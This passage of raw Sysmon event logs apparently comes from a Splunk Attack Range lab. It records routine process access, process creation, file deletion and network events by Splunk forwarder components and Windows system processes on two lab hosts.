Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001055435Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:53.088{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F8D1-60EB-0D7E-00000000CF01}9372C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001055434Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:53.082{466BC892-F8D1-60EB-0D7E-00000000CF01}9372C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000810764Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:54.969{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C0103E0AFA3C0EDB6D1A61A74B6F7874,SHA256=7F07A6C8C557901C5AC5E2929CCD3C086D871005287B9E41F571F1BA919BD2DB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055461Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:54.620{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5AB97CBC11156972245D3F4F1A5A1390,SHA256=05C19B746FC41D6136218001CD8372DDC454AB2B3B956ACC889287B27C4B364E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001055460Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:54.394{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F8D2-60EB-0F7E-00000000CF01}9468C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055459Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:54.394{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055458Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:54.394{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055457Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:54.394{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055456Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:54.394{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055455Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:54.394{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F8D2-60EB-0F7E-00000000CF01}9468C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001055454Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:54.394{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F8D2-60EB-0F7E-00000000CF01}9468C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001055453Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:54.379{466BC892-F8D2-60EB-0F7E-00000000CF01}9468C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001055452Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:54.095{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F6AA9351CC0F18E5F0EAC9FC88D5ECD7,SHA256=E678A7454D72CF1B3C723CC754865108F9518A5CE9AAB7405A7FA592C72B21CC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001055451Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:54.006{466BC892-F8D1-60EB-0E7E-00000000CF01}43764804C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001055463Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:55.635{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8D6CAE06EA0D85752652F5504B53C951,SHA256=808CD096EC6A62977077889EF5B8F44E0128B19916EA7A6EFE74E2F7C3194684,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055462Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:55.382{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A195BE95934AFB6370BB6DEA09A62D2E,SHA256=83416A11A63C1BDFCA74328036C4F3F31AFD732A65157A452D76D9B7F15685BE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055464Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:56.650{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F92CD2ABC152F6FAFB4B1973E5C87AD0,SHA256=AF71BD5C9355CA8EDCD5FF632EF3BE75BC62741806A645511AE8192838E0B25E,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000810766Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:55.212{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57491-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000810765Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:56.000{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7A93D7CF57413A4BA3A70D9EB27CE705,SHA256=1584AB13C07B03014CFE5C413C29A8F58E55FAB062E15D3A675745DFE3ABCD59,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055466Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:57.665{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9859EEC291CE42FA70B64AD560B61803,SHA256=1535755C35858F3B3A983EABE2ED06E28DEBE7ECB5933D1C1E6CC8ACF48267CC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810767Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:57.016{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=78EF1AF463BF45418FAF7BCDFCE4EA98,SHA256=2DD2FE4DCB4AB72645F072426304350AD6F630AF16019922B41D28A3285CEE6E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055465Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:57.449{466BC892-02BC-60E8-2A00-00000000CF01}2928NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=DD4D1D185AB4AED8A391DDEB7814ED87,SHA256=CA570F672172721E4189F1D4FCAE899B45A155271730C13B6A88FE6BC47AB312,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055468Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:58.680{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A1D7A9A4D1362DA283FA6EBF3B121CF7,SHA256=37E690ED4AF60E2E0CB686D63FE6245418E34B0B1B7BDAAD11880328D76255F4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810768Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:58.047{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4C6526A9C01E9405901FEA15D0A50266,SHA256=1A27A720D9C2A319CE257130D4223EC8254E4FE46C34DFCE08420767EF0225B6,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001055467Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:50.773{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local62002-false10.0.1.12-8000- 354300x80000000000000001055470Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:50.957{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local62003-false10.0.1.12-8089- 23542300x80000000000000001055469Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:59.695{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0A86AE483AD22B255C959B185A47B1C6,SHA256=B4B0D9980DC7B0332D512758DECB3B5D2F17C6B6DD8E59D7A5D8D224BC128175,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810769Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:59.047{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=331A326FB47163C363576A57A4F38B2B,SHA256=F7F104AF7B8F10D0585799ABF6DA87D1BE8E6D04C46353C7230E9A7FA4592B9A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055471Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:00.700{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=332F13F1A1B493054CB934DEB0DE16F5,SHA256=E69E976F7899B68CBDD59E61F32FD377551F4E838F8516E161F51F073EE17B4E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810770Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:00.063{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=79EB9829CF0242074B25C67854FEE0EF,SHA256=9181535969DEBCF8227C604BCF12B0D9F12557B5E1A2225D7CEB268371979627,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055472Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:01.701{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7053E9A2D258DFDFB40949766E4FA8A1,SHA256=FB3833B94BFFC7074205E09CB430D30DB8C3B6E3D9B8F73F4007DBC55F437CD0,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000810772Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:00.383{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57492-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000810771Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:01.063{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E282BCAE40064DC06EB6A9BB6A414B5D,SHA256=2FAC75F715E0ABCD2DD1D08EC9622D9CB6525642E94C4D9149940886D53D5D78,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055473Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:02.704{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=23FEAE0182BE406EC017348EF47B5E70,SHA256=CFB94A2F0B559EB9A2F8DA78D53FE13E00C806CE06191FBB58ABD406BCEBFE85,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810773Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:02.094{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A27875B710697CBD469FFF08A02AFF86,SHA256=AA75C3473D1BC79E21D961FCCB10C1B0CB8DE308DADACBEB6D2ACB3A59FC6C26,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055474Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:03.741{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=951817FCDF2BD7BAA32625BA95348F34,SHA256=BB89A246942C1B3E7825B6F3C581844AF682404E22243F8734E8B963CA4D9DCC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810774Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:03.125{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3A09DEF49CFA1ACEB6982F1640E15A8F,SHA256=D3C486826EAE66021D1F4D14F7D8D79D8B074A32D1AB427237C0BAB0D63A0348,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055476Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:04.772{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BE36B56FFB0E24DA229B22BA0E749DEC,SHA256=6C49D12DFF475CCB7358C6D7759B7F64854299A321C66E20B1E3886245ABA186,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810775Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:04.127{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D397FAA4EDC0FF7B60148A4AF9CE709C,SHA256=E7122F82EB5BA6EBB11B81E42EB3049ACD5E364E67C07FAEB6856A90B798A177,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001055475Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:56.765{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local62004-false10.0.1.12-8000- 23542300x80000000000000001055477Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:05.776{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E7D8AEA00BFC02FF3F57F8F243273E54,SHA256=0896BBCD934B8469C54A075DB95F304A6167ACC911C86546360B96650D1E731F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810776Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:05.140{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=450E9325FC2C37C008C3FD3E35BF3649,SHA256=BC1630A07C90BF4601BD9F366BE2166411F2C05EE54F05D590F70C26F1BAA32F,IMPHASH=00000000000000000000000000000000falsetrue 